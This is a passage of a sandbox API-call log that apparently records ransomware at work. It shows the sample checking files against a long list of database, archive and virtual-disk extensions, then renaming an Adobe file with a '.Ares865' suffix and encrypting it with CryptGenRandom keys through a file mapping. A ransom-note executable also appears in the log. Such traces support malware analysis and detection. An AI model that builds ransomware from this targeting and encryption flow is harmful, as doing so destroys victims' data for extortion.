[0091.515] lstrlenW (lpString="ba_") returned 3 [0091.515] lstrcmpiW (lpString1="ata", lpString2="ba_") returned -1 [0091.515] lstrlenW (lpString="dbb") returned 3 [0091.515] lstrcmpiW (lpString1="ata", lpString2="dbb") returned -1 [0091.516] lstrlenW (lpString="vmdk") returned 4 [0091.516] lstrcmpiW (lpString1="data", lpString2="vmdk") returned -1 [0091.516] lstrlenW (lpString="rar") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="rar") returned -1 [0091.516] lstrlenW (lpString="zip") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="zip") returned -1 [0091.516] lstrlenW (lpString="tgz") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="tgz") returned -1 [0091.516] lstrlenW (lpString="vbox") returned 4 [0091.516] lstrcmpiW (lpString1="data", lpString2="vbox") returned -1 [0091.516] lstrlenW (lpString="vdi") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="vdi") returned -1 [0091.516] lstrlenW (lpString="vhd") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="vhd") returned -1 [0091.516] lstrlenW (lpString="vhdx") returned 4 [0091.516] lstrcmpiW (lpString1="data", lpString2="vhdx") returned -1 [0091.516] lstrlenW (lpString="avhd") returned 4 [0091.516] lstrcmpiW (lpString1="data", lpString2="avhd") returned 1 [0091.516] lstrlenW (lpString="db") returned 2 [0091.516] lstrcmpiW (lpString1="ta", lpString2="db") returned 1 [0091.516] lstrlenW (lpString="db2") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="db2") returned -1 [0091.516] lstrlenW (lpString="db3") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="db3") returned -1 [0091.516] lstrlenW (lpString="dbf") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="dbf") returned -1 [0091.516] lstrlenW (lpString="mdf") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="mdf") returned -1 [0091.516] lstrlenW (lpString="mdb") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="mdb") returned -1 [0091.516] lstrlenW (lpString="sql") returned 3 [0091.516] lstrcmpiW (lpString1="ata", lpString2="sql") returned -1 [0091.516] lstrlenW (lpString="sqlite") returned 6 [0091.516] lstrcmpiW (lpString1="rodata", lpString2="sqlite") returned -1 [0091.516] lstrlenW (lpString="sqlite3") returned 7 [0091.516] lstrcmpiW (lpString1="crodata", lpString2="sqlite3") returned -1 [0091.516] lstrlenW (lpString="sqlitedb") returned 8 [0091.516] lstrcmpiW (lpString1="acrodata", lpString2="sqlitedb") returned -1 [0091.516] lstrlenW (lpString="xml") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="xml") returned -1 [0091.517] lstrlenW (lpString="$er") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="$er") returned 1 [0091.517] lstrlenW (lpString="4dd") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="4dd") returned 1 [0091.517] lstrlenW (lpString="4dl") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="4dl") returned 1 [0091.517] lstrlenW (lpString="^^^") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="^^^") returned 1 [0091.517] lstrlenW (lpString="abs") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="abs") returned 1 [0091.517] lstrlenW (lpString="abx") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="abx") returned 1 [0091.517] lstrlenW (lpString="accdb") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accdb") returned 1 [0091.517] lstrlenW (lpString="accdc") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accdc") returned 1 [0091.517] lstrlenW (lpString="accde") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accde") returned 1 [0091.517] lstrlenW (lpString="accdr") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accdr") returned 1 [0091.517] lstrlenW (lpString="accdt") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accdt") returned 1 [0091.517] lstrlenW (lpString="accdw") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accdw") returned 1 [0091.517] lstrlenW (lpString="accft") returned 5 [0091.517] lstrcmpiW (lpString1="odata", lpString2="accft") returned 1 [0091.517] lstrlenW (lpString="adb") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="adb") returned 1 [0091.517] lstrlenW (lpString="adb") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="adb") returned 1 [0091.517] lstrlenW (lpString="ade") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="ade") returned 1 [0091.517] lstrlenW (lpString="adf") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="adf") returned 1 [0091.517] lstrlenW (lpString="adn") returned 3 [0091.517] lstrcmpiW (lpString1="ata", lpString2="adn") returned 1 [0091.517] lstrlenW (lpString="adp") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="adp") returned 1 [0091.518] lstrlenW (lpString="alf") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="alf") returned 1 [0091.518] lstrlenW (lpString="ask") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="ask") returned 1 [0091.518] lstrlenW (lpString="btr") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="btr") returned -1 [0091.518] lstrlenW (lpString="cat") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="cat") returned -1 [0091.518] lstrlenW (lpString="cdb") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="cdb") returned -1 [0091.518] lstrlenW (lpString="ckp") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="ckp") returned -1 [0091.518] lstrlenW (lpString="cma") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="cma") returned -1 [0091.518] lstrlenW (lpString="cpd") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="cpd") returned -1 [0091.518] lstrlenW (lpString="dacpac") returned 6 [0091.518] lstrcmpiW (lpString1="rodata", lpString2="dacpac") returned 1 [0091.518] lstrlenW (lpString="dad") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="dad") returned -1 [0091.518] lstrlenW (lpString="dadiagrams") returned 10 [0091.518] lstrcmpiW (lpString1="s.acrodata", lpString2="dadiagrams") returned 1 [0091.518] lstrlenW (lpString="daschema") returned 8 [0091.518] lstrcmpiW (lpString1="acrodata", lpString2="daschema") returned -1 [0091.518] lstrlenW (lpString="db-journal") returned 10 [0091.518] lstrcmpiW (lpString1="s.acrodata", lpString2="db-journal") returned 1 [0091.518] lstrlenW (lpString="db-shm") returned 6 [0091.518] lstrcmpiW (lpString1="rodata", lpString2="db-shm") returned 1 [0091.518] lstrlenW (lpString="db-wal") returned 6 [0091.518] lstrcmpiW (lpString1="rodata", lpString2="db-wal") returned 1 [0091.518] lstrlenW (lpString="dbc") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="dbc") returned -1 [0091.518] lstrlenW (lpString="dbs") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="dbs") returned -1 [0091.518] lstrlenW (lpString="dbt") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="dbt") returned -1 [0091.518] lstrlenW (lpString="dbv") returned 3 [0091.518] lstrcmpiW (lpString1="ata", lpString2="dbv") returned -1 [0091.519] lstrlenW (lpString="dbx") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dbx") returned -1 [0091.519] lstrlenW (lpString="dcb") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dcb") returned -1 [0091.519] lstrlenW (lpString="dct") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dct") returned -1 [0091.519] lstrlenW (lpString="dcx") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dcx") returned -1 [0091.519] lstrlenW (lpString="ddl") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="ddl") returned -1 [0091.519] lstrlenW (lpString="dlis") returned 4 [0091.519] lstrcmpiW (lpString1="data", lpString2="dlis") returned -1 [0091.519] lstrlenW (lpString="dp1") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dp1") returned -1 [0091.519] lstrlenW (lpString="dqy") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dqy") returned -1 [0091.519] lstrlenW (lpString="dsk") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dsk") returned -1 [0091.519] lstrlenW (lpString="dsn") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dsn") returned -1 [0091.519] lstrlenW (lpString="dtsx") returned 4 [0091.519] lstrcmpiW (lpString1="data", lpString2="dtsx") returned -1 [0091.519] lstrlenW (lpString="dxl") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="dxl") returned -1 [0091.519] lstrlenW (lpString="eco") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="eco") returned -1 [0091.519] lstrlenW (lpString="ecx") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="ecx") returned -1 [0091.519] lstrlenW (lpString="edb") returned 3 [0091.519] lstrcmpiW (lpString1="ata", lpString2="edb") returned -1 [0091.519] lstrlenW (lpString="epim") returned 4 [0091.519] lstrcmpiW (lpString1="data", lpString2="epim") returned -1 [0091.520] lstrlenW (lpString="fcd") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fcd") returned -1 [0091.520] lstrlenW (lpString="fdb") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fdb") returned -1 [0091.520] lstrlenW (lpString="fic") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fic") returned -1 [0091.520] lstrlenW (lpString="flexolibrary") returned 12 [0091.520] lstrcmpiW (lpString1="ies.acrodata", lpString2="flexolibrary") returned 1 [0091.520] lstrlenW (lpString="fm5") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fm5") returned -1 [0091.520] lstrlenW (lpString="fmp") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fmp") returned -1 [0091.520] lstrlenW (lpString="fmp12") returned 5 [0091.520] lstrcmpiW (lpString1="odata", lpString2="fmp12") returned 1 [0091.520] lstrlenW (lpString="fmpsl") returned 5 [0091.520] lstrcmpiW (lpString1="odata", lpString2="fmpsl") returned 1 [0091.520] lstrlenW (lpString="fol") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fol") returned -1 [0091.520] lstrlenW (lpString="fp3") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fp3") returned -1 [0091.520] lstrlenW (lpString="fp4") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fp4") returned -1 [0091.520] lstrlenW (lpString="fp5") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fp5") returned -1 [0091.520] lstrlenW (lpString="fp7") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fp7") returned -1 [0091.520] lstrlenW (lpString="fpt") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="fpt") returned -1 [0091.520] lstrlenW (lpString="frm") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="frm") returned -1 [0091.520] lstrlenW (lpString="gdb") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="gdb") returned -1 [0091.520] lstrlenW (lpString="gdb") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="gdb") returned -1 [0091.520] lstrlenW (lpString="grdb") returned 4 [0091.520] lstrcmpiW (lpString1="data", lpString2="grdb") returned -1 [0091.520] lstrlenW (lpString="gwi") returned 3 [0091.520] lstrcmpiW (lpString1="ata", lpString2="gwi") returned -1 [0091.520] lstrlenW (lpString="hdb") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="hdb") returned -1 [0091.521] lstrlenW (lpString="his") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="his") returned -1 [0091.521] lstrlenW (lpString="ib") returned 2 [0091.521] lstrcmpiW (lpString1="ta", lpString2="ib") returned 1 [0091.521] lstrlenW (lpString="idb") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="idb") returned -1 [0091.521] lstrlenW (lpString="ihx") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="ihx") returned -1 [0091.521] lstrlenW (lpString="itdb") returned 4 [0091.521] lstrcmpiW (lpString1="data", lpString2="itdb") returned -1 [0091.521] lstrlenW (lpString="itw") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="itw") returned -1 [0091.521] lstrlenW (lpString="jet") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="jet") returned -1 [0091.521] lstrlenW (lpString="jtx") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="jtx") returned -1 [0091.521] lstrlenW (lpString="kdb") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="kdb") returned -1 [0091.521] lstrlenW (lpString="kexi") returned 4 [0091.521] lstrcmpiW (lpString1="data", lpString2="kexi") returned -1 [0091.521] lstrlenW (lpString="kexic") returned 5 [0091.521] lstrcmpiW (lpString1="odata", lpString2="kexic") returned 1 [0091.521] lstrlenW (lpString="kexis") returned 5 [0091.521] lstrcmpiW (lpString1="odata", lpString2="kexis") returned 1 [0091.521] lstrlenW (lpString="lgc") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="lgc") returned -1 [0091.521] lstrlenW (lpString="lwx") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="lwx") returned -1 [0091.521] lstrlenW (lpString="maf") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="maf") returned -1 [0091.521] lstrlenW (lpString="maq") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="maq") returned -1 [0091.521] lstrlenW (lpString="mar") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="mar") returned -1 [0091.521] lstrlenW (lpString="marshal") returned 7 [0091.521] lstrcmpiW (lpString1="crodata", lpString2="marshal") returned -1 [0091.521] lstrlenW (lpString="mas") returned 3 [0091.521] lstrcmpiW (lpString1="ata", lpString2="mas") returned -1 [0091.522] lstrlenW (lpString="mav") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mav") returned -1 [0091.522] lstrlenW (lpString="maw") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="maw") returned -1 [0091.522] lstrlenW (lpString="mdbhtml") returned 7 [0091.522] lstrcmpiW (lpString1="crodata", lpString2="mdbhtml") returned -1 [0091.522] lstrlenW (lpString="mdn") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mdn") returned -1 [0091.522] lstrlenW (lpString="mdt") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mdt") returned -1 [0091.522] lstrlenW (lpString="mfd") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mfd") returned -1 [0091.522] lstrlenW (lpString="mpd") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mpd") returned -1 [0091.522] lstrlenW (lpString="mrg") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mrg") returned -1 [0091.522] lstrlenW (lpString="mud") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mud") returned -1 [0091.522] lstrlenW (lpString="mwb") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="mwb") returned -1 [0091.522] lstrlenW (lpString="myd") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="myd") returned -1 [0091.522] lstrlenW (lpString="ndf") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="ndf") returned -1 [0091.522] lstrlenW (lpString="nnt") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="nnt") returned -1 [0091.522] lstrlenW (lpString="nrmlib") returned 6 [0091.522] lstrcmpiW (lpString1="rodata", lpString2="nrmlib") returned 1 [0091.522] lstrlenW (lpString="ns2") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="ns2") returned -1 [0091.522] lstrlenW (lpString="ns3") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="ns3") returned -1 [0091.522] lstrlenW (lpString="ns4") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="ns4") returned -1 [0091.522] lstrlenW (lpString="nsf") returned 3 [0091.522] lstrcmpiW (lpString1="ata", lpString2="nsf") returned -1 [0091.522] lstrlenW (lpString="nv") returned 2 [0091.522] lstrcmpiW (lpString1="ta", lpString2="nv") returned 1 [0091.523] lstrlenW (lpString="nv2") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="nv2") returned -1 [0091.523] lstrlenW (lpString="nwdb") returned 4 [0091.523] lstrcmpiW (lpString1="data", lpString2="nwdb") returned -1 [0091.523] lstrlenW (lpString="nyf") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="nyf") returned -1 [0091.523] lstrlenW (lpString="odb") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="odb") returned -1 [0091.523] lstrlenW (lpString="odb") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="odb") returned -1 [0091.523] lstrlenW (lpString="oqy") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="oqy") returned -1 [0091.523] lstrlenW (lpString="ora") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="ora") returned -1 [0091.523] lstrlenW (lpString="orx") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="orx") returned -1 [0091.523] lstrlenW (lpString="owc") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="owc") returned -1 [0091.523] lstrlenW (lpString="p96") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="p96") returned -1 [0091.523] lstrlenW (lpString="p97") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="p97") returned -1 [0091.523] lstrlenW (lpString="pan") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="pan") returned -1 [0091.523] lstrlenW (lpString="pdb") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="pdb") returned -1 [0091.523] lstrlenW (lpString="pdm") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="pdm") returned -1 [0091.523] lstrlenW (lpString="pnz") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="pnz") returned -1 [0091.523] lstrlenW (lpString="qry") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="qry") returned -1 [0091.523] lstrlenW (lpString="qvd") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="qvd") returned -1 [0091.523] lstrlenW (lpString="rbf") returned 3 [0091.523] lstrcmpiW (lpString1="ata", lpString2="rbf") returned -1 [0091.523] lstrlenW (lpString="rctd") returned 4 [0091.523] lstrcmpiW (lpString1="data", lpString2="rctd") returned -1 [0091.523] lstrlenW (lpString="rod") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="rod") returned -1 [0091.524] lstrlenW (lpString="rodx") returned 4 [0091.524] lstrcmpiW (lpString1="data", lpString2="rodx") returned -1 [0091.524] lstrlenW (lpString="rpd") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="rpd") returned -1 [0091.524] lstrlenW (lpString="rsd") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="rsd") returned -1 [0091.524] lstrlenW (lpString="sas7bdat") returned 8 [0091.524] lstrcmpiW (lpString1="acrodata", lpString2="sas7bdat") returned -1 [0091.524] lstrlenW (lpString="sbf") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="sbf") returned -1 [0091.524] lstrlenW (lpString="scx") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="scx") returned -1 [0091.524] lstrlenW (lpString="sdb") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="sdb") returned -1 [0091.524] lstrlenW (lpString="sdc") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="sdc") returned -1 [0091.524] lstrlenW (lpString="sdf") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="sdf") returned -1 [0091.524] lstrlenW (lpString="sis") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="sis") returned -1 [0091.524] lstrlenW (lpString="spq") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="spq") returned -1 [0091.524] lstrlenW (lpString="te") returned 2 [0091.524] lstrcmpiW (lpString1="ta", lpString2="te") returned -1 [0091.524] lstrlenW (lpString="teacher") returned 7 [0091.524] lstrcmpiW (lpString1="crodata", lpString2="teacher") returned -1 [0091.524] lstrlenW (lpString="tmd") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="tmd") returned -1 [0091.524] lstrlenW (lpString="tps") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="tps") returned -1 [0091.524] lstrlenW (lpString="trc") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="trc") returned -1 [0091.524] lstrlenW (lpString="trc") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="trc") returned -1 [0091.524] lstrlenW (lpString="trm") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="trm") returned -1 [0091.524] lstrlenW (lpString="udb") returned 3 [0091.524] lstrcmpiW (lpString1="ata", lpString2="udb") returned -1 [0091.525] lstrlenW (lpString="udl") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="udl") returned -1 [0091.525] lstrlenW (lpString="usr") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="usr") returned -1 [0091.525] lstrlenW (lpString="v12") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="v12") returned -1 [0091.525] lstrlenW (lpString="vis") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="vis") returned -1 [0091.525] lstrlenW (lpString="vpd") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="vpd") returned -1 [0091.525] lstrlenW (lpString="vvv") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="vvv") returned -1 [0091.525] lstrlenW (lpString="wdb") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="wdb") returned -1 [0091.525] lstrlenW (lpString="wmdb") returned 4 [0091.525] lstrcmpiW (lpString1="data", lpString2="wmdb") returned -1 [0091.525] lstrlenW (lpString="wrk") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="wrk") returned -1 [0091.525] lstrlenW (lpString="xdb") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="xdb") returned -1 [0091.525] lstrlenW (lpString="xld") returned 3 [0091.525] lstrcmpiW (lpString1="ata", lpString2="xld") returned -1 [0091.525] lstrlenW (lpString="xmlff") returned 5 [0091.525] lstrcmpiW (lpString1="odata", lpString2="xmlff") returned -1 [0091.525] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.Ares865") returned 255 [0091.525] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.ares865"), dwFlags=0x1) returned 1 [0091.526] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.527] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=479) returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.527] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.528] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x15c [0091.530] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x190000 [0091.531] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.532] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.532] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.532] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31b0d0 [0091.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.532] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31b0d0 | out: hHeap=0x2b0000) returned 1 [0091.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0091.532] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.532] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0091.532] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.532] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.533] CloseHandle (hObject=0x15c) returned 1 [0091.533] CloseHandle (hObject=0x118) returned 1 [0091.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.533] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d007520, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.533] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.533] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d007520, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 